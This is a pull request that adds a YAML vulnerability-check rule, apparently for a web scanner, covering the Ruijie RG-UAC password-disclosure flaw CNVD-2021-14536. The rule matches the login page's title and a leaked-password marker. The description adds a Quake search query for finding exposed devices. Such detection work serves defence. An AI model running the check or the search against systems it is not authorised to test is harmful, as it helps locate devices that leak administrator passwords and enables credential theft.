### PR TITLE
ruijie-uac-cnvd-2021-14536

### DIFF
--- a/pocs/ruijie-uac-cnvd-2021-14536.yml
+++ b/pocs/ruijie-uac-cnvd-2021-14536.yml
@@ -1,0 +1,11 @@
+name: poc-yaml-ruijie-uac-cnvd-2021-14536
+rules:
+  - method: GET
+    path: /login.php
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"<title>RG-UAC登录页面</title>") && response.body.bcontains(b"get_dkey_passwd") && response.body.bcontains(b"password")
+detail:
+  author: jweny(https://github.com/jweny)
+  links:
+    - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454335065


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的

锐捷RG-UAC  CNVD-2021-14536 信息泄露漏洞
账号密码泄露

## 测试环境
Quake空间测绘搜索语句：title:"RG-UAC登录页面" AND response:"admin"

## 备注
![image](https://user-images.githubusercontent.com/26767398/110293573-b4302280-8029-11eb-931c-66ad20f5d661.png)

